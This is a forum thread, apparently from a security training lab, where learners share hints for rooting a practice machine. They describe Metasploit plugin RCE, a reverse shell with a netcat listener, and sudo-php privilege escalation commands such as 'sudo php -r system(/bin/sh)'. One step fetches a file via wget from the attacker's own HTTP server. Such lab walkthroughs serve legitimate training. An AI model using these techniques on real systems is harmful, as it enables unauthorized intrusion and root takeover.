Can I get a hint about the password? nothing obvious is working
If you search for “common default password” it gives some very common default passwords for vendor accounts in the first results.
That being said, I didn’t need to login with the admin account to get information I needed. I was using metasploit though.
Okay, full disclosure, this was my own user error. I have to assume that is the case, but in leui of a lengthy explanation, lets just say the credentials that work, were always the 4-5th credentials i would try per an instance. soooo. yeah it was basic af. However, exploiting a php upload path to get in manually isnt allowing me to access the final flag, so i have to ask? People are saying you are supposed to ssh in from your Own VM in order to escalate privileges. I argued this sounded wrong to me because as of yet I havent done a module which required SSH to the best of my knowledge. Let alone doing so from my own spun up machine. So I have to ask, should i just avoid that altogether and consider it poor memory of the module or actually try and do that? Or what direction can someone offer for using the metasploit option? Thankye.
I suspect the way I did it was pretty primitive because I am still quite new to this, but I will try to outline my process without giving spoilers.
- enumerate the website and you find that there is a plugin running on the website
- Per previous lessons I searched online for the name of the plugin and current exploits for it
++Confirmed that the version running on the web server is vulnerable to the exploit
- Because I hadn’t yet figured out the password I chose to target an option for unauthenticated remote code execution
- I opened a terminal and opened msfconsole
- I ran the “search PLUGINNAME” option, where PLUGGINNAME is the name of the acutal plugin, and it displayed similar results for vulnerabilities
- In the metasploit command line you can type “use” and then the number corresponding to the exploit you want to use from the list of available exploits
++In my case I believe it was “use 1”
- Now you can type “show options” to see what your options are to try to establish the reverse shell
++This I just guessed at. Not many options needed to be configured.
- Once you have configured the correct options you can type “exploit” and it will create the reverse TCP shell.
++Note: I had issues after making this connection if I let a first instance of the session time out due to being unable to figure out the next part quickly enough. Afterward I had to reset both the target and attacking machine instances. I’m sure there was an easier way to clean out whatever broke the second attempt at re-establishing the reverse shell.
- When the session is established you can type “shell” to start the process of accessing the connection with a more functional shell. In one of the earlier sections of this module it outlines the command options to create a tty shell afterward, which is immensely more helpful.
- Run sudo -l to see if it gives you any info about which users can run root commands without a password
++This helped me, but other people advised also using LinEnum.sh or LinPeas.sh to get a better picture of what privileges we might be able to exploit. See previous comments in this thread about how to get that part working. simulation42’s post on Jun 26 gave me the missing piece I was having trouble with.
- At this point I knew I could run something as root without a password. It took me a little bit to realize I shouldn’t try to change to that directory because it was not a file I was able to execute from there (as we saw with the monitor.sh file from our lessons).
- I started looking up how to use the directory with online reverse shell cheat sheet commands, but the connections those helped me establish would not allow me RCE from the attacking machine.
++It was trial and error trying to figure out which command to use here, but it ended up being run from within my existing reverse shell. The command was a very basic one that essentially opened a root shell
- I could see that my use was root@getting-started so from there I searched for the root.txt flag and fortunately found it by guessing which directory it might be in. I could not figure out how to get a global directory search to work for that file.
explore admin page …
Wow this one took me way too long. I got in and got the user flag pretty easy. Even figured out I needed to do something with the particular command you can run with sudo. But man my syntax was slightly off. I just didn’t understand where I needed to look on GTFObins.
In summary: You need very little to do this.
I got admin on the website with simple credentials
Found an exploit on the platform the website ran on.
Uploaded a rev shell (same one from earlier in the module) through the website in the way the exploit explained.
Opened up a netcat listener on my attack machine. Got rev shell no problem.
Get user flag
Figure out what commands I can run with sudo
Completely misunderstand what I’m seeing of GTFObins
Finally get it together and figure out the right command
Sorry for my poor English
You’re using the wget command correctly. But you have to use the command in the /var/www/html/theme/Innovation directory location. Because you can’t write or execute any file in other location.
Sorry for my poor English!
It’s pretty simple though, " NOPASSWD: /usr/bin/php ". we can use this to get root access, by just using belove command
sudo /usr/bin/php -r "system("/bin/sh");".
If this somebody is still reading this i hope it’s useful, so for the first task in order to gain user.txt flag you can find somewhere on the website version of that is being used ans search msfconsole for it with syntax
search exploit <version number>. Then you just need to set RHOST,RPORT, and LHOST, you can leave the payload as is for know. You will gain control as a user and just navigate to the user.txt.
For the next task, you need to gain root access, you can still use the same exploit in msfcosnole but this time you need to change payload, to number one with following syntax
use payload 1. After that you will obtain the shell and you can start navigating through the machine. if you type command
sydo -l, you will see that you can ran ‘/usr/bin/php’ with NOPASSWD which means you can run this command as root user. Cool so now you need to PHP script to gain priv. escalation, and the script is:
CMD="/bin/sh" sudo php -r "system('$CMD');"
This script only allows me to type into the shell, I didn’t get root access with it. To tell you the truth I couldn’t run any script that would give me root access
here: php | GTFOBins
GTFOBins proves useful for privesc
i got reverse shell and when i want to get sudo shell freeze: sudo php -r “system(‘/bin/sh’);” does this command work to you?
I hope this solution will help somebody get the root flag.
What I simply did was create a php file on my machine:
<?php system ("su root"); ?>
then start a server with
sudo python3 -m http.server 8080
get the file on the target machine
wget http://your ip:8080/file.php
and get root with
sudo php -f file.php
Remember to do it in the “/var/www/html/theme/Innovation” directory location.
theme template is interesting.
I wrote a blog about it, you can read it：每日一练 - HgTrojan